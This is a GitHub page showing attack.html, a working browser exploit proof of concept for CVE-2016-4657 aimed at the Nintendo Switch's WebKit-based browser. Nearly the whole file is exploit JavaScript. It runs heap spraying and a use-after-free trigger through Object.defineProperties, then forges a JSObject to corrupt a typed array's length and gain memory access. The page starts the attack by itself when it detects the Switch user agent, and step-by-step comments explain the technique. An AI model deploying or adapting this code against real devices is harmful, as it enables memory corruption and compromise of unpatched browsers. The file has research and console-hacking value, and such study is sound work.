-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathattack.html
193 lines (191 loc) · 10.6 KB
/
attack.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
<1attack-script>
<!doctype html>
<html>
<head>
<title>CVE-2016-4657 Switch PoC</title>
<style>
body {font-size: 2em;}
a {text-decoration: none; color: #000;}
a:hover {color: #f00; font-weight: bold;}
</style>
</head>
<body>
<h1>CVE-2016-4657 Nintendo Switch PoC</h1>
<ul>
<li><a href='javascript:go();'>?? go!</a></li>
<li><a href='javascript:document.location.reload();'>?? reload</a></li>
</ul>
<div id='status'>?? waiting... click go.</div>
<script>
// display JS errors as alerts. Helps debugging.
window.onerror = function(error, url, line) {
alert(error+' URL:'+url+' L:'+line);
};
</script>
<script>
// based on jbme.qwertyoruiop.com
// Thanks to:
// + qwertyoruiop
// + Retr0id
// + Ando
//
// saelo's phrack article is invaluable: http://www.phrack.org/papers/attacking_javascript_engines.html
// garbage collection stuff
var pressure = new Array(100);
// do garbage collect
dgc = function() {
for (var i = 0; i < pressure.length; i++) {
pressure[i] = new Uint32Array(0x10000);
}
for (var i = 0; i < pressure.length; i++) {
pressure[i] = 0;
}
}
// access to the overlapping Uint32Array
var bufs = new Array(0x1000);
// we will modify the vector of this
var smash = new Uint32Array(0x10);
// the array with the stale pointer
var stale = 0;
var _dview = null;
// write 2x 32bit in a DataView and get the Float representation of it
function u2d(low, hi) {
if (!_dview) _dview = new DataView(new ArrayBuffer(16));
_dview.setUint32(0, hi);
_dview.setUint32(4, low);
return _dview.getFloat64(0);
}
function go_() {
// check if the length of the array smash changed already. if yes, bail out.
if (smash.length != 0x10) return;
// garbage collect
dgc();
// new array with 0x100 elements
var arr = new Array(0x100);
// new array buffer of length 0x1000
var yolo = new ArrayBuffer(0x1000);
// populate the arr with pointer to yolo and a number. not quite sure why.
arr[0] = yolo;
arr[1] = 0x13371337;
// create an object whos toString function returns number 10 and messes with arr.
var not_number = {};
not_number.toString = function() {
arr = null;
props["stale"]["value"] = null;
// if bufs is already overlapping memory, bail out.
if (bufs[0]) return 10;
// really make sure garbage is collected
// the array pointed at by arr should be gone now.
for (var i = 0; i < 20; i++) {
dgc();
}
// for the whole buf Array
for (i = 0; i < bufs.length; i++) {
// fill it with a lot of Uint32Arrays, hopefully allocated where arr was earlier
bufs[i] = new Uint32Array(0x100 * 2)
// for each element of that array
for (k = 0; k < bufs[i].length;) {
// set memory to 0x41414141 0xffff0000
// basically spraying the JSValue 0xffff000041414141
// which is the Integer 0x41414141
// phrack: Integer FFFF:0000:IIII:IIII
bufs[i][k++] = 0x41414141;
bufs[i][k++] = 0xffff0000;
}
}
return 10;
};
// define a new object with some properties
var props = {
p0: { value: 0 },
p1: { value: 1 },
p2: { value: 2 },
p3: { value: 3 },
p4: { value: 4 },
p5: { value: 5 },
p6: { value: 6 },
p7: { value: 7 },
p8: { value: 8 },
// the length of this object is set to this object that does evil stuff with toString()
length: { value: not_number },
// the reference to the arr array. Which will later be freed.
stale: { value: arr },
after: { value: 666 }
};
// define a new target array
var target = [];
// TRIGGER BUG!
// set the properties of the target based on the previously defined ones
Object.defineProperties(target, props);
// get a reference to the target stale property, which points to arr
stale = target.stale;
// make sure that the stale[0] points actually to the 0x41414141 data if not, we don't wanna mess with it and try again
if(stale[0]==0x41414141) {
// stale[0] is now pointing at a fake Integer 0x41414141. Now make it 0x41414242
stale[0] += 0x101;
//stale[0] = 0x41414242;
//document.getElementById('status').innerText = 'bug done.';
// searching the whole memory that is overlaying the old arr. Looking for 0x41414242
for (i = 0; i < bufs.length; i++) {
for (k = 0; k < bufs[0].length; k++) {
// Found the value! bufs[i][k] point now at the same memory as stale[0]
if (bufs[i][k] == 0x41414242) {
alert('Overlapping Arrays found at bufs['+i+']['+k+']\nsmash.length is still: 0x'+smash.length.toString(16));
// create a new object. Will look kinda like this:
// 0x0100150000000136 0x0000000000000000 <- fictional value
// 0x0000000000000064 0x0000000000000000 <- ['a'],['b']
// 0x???????????????? 0x0000000000000100 <- ['c'],['d']
stale[0] = {
'a': u2d(105, 0), // the JSObject properties ; 105 is the Structure ID of Uint32Array
'b': u2d(0, 0),
'c': smash, // var pointing at the struct of a Uint32Array(0x10)
'd': u2d(0x100, 0)
}
alert('created the JSObject.\nstale[0] = '+stale[0]);
// remember the original stale pointer, pointing at the object with the a,b,c,d properties
stale[1] = stale[0];
// now add 0x10 to the pointer of stale[0], which points now in the middle of the object.
bufs[i][k] += 0x10;
// check the type of stale[0].
// removed the loop because it makes the exploit sooooooo unreliable
// based on phrack paper - Predicting structure IDs (http://www.phrack.org/papers/attacking_javascript_engines.html)
/*while(!(stale[0] instanceof Uint32Array)) {
// if stale[0] is not a Uint32Array yet, increment the structureID guess
structureID++;
// assign the next structureID to the original object still referenced by stale[1]
stale[1]['a'] = u2d(structureID, 0);
}*/
// Give some information. stale[0] should now be a Uint32Array
alert('misaligned the pointer to the JSObject.\nstale[0] = '+stale[0]+'');
// write to the 6th 32bit value of the memory pointed to by the crafted Uint32Array
// which should point to the struct of smash, allowing us to overwrite the length of smash
stale[0][6] = 0x1337;
// check the length of smash is now.
alert('smash.length is now: 0x'+smash.length.toString(16));
alert('done!\nswitch will probably crash now :O');
return;
}
}
}
}
document.getElementById('status').innerText = '?? fail. refresh the page and try again...';
setTimeout(function() {document.location.reload();}, 1000);
}
function go() {
document.getElementById('status').innerText = '?????? go! ??????';
dgc();
dgc();
dgc();
dgc();
dgc();
dgc();
setTimeout(go_, 500);
}
// if Switch browser is detected, auto start exploit
if(navigator.userAgent.indexOf('Nintendo Switch')>-1) {
document.getElementById('status').innerText = 'Found Nintendo Switch! ??';
setTimeout(go, 2000);
}
</script>
</body>
</html>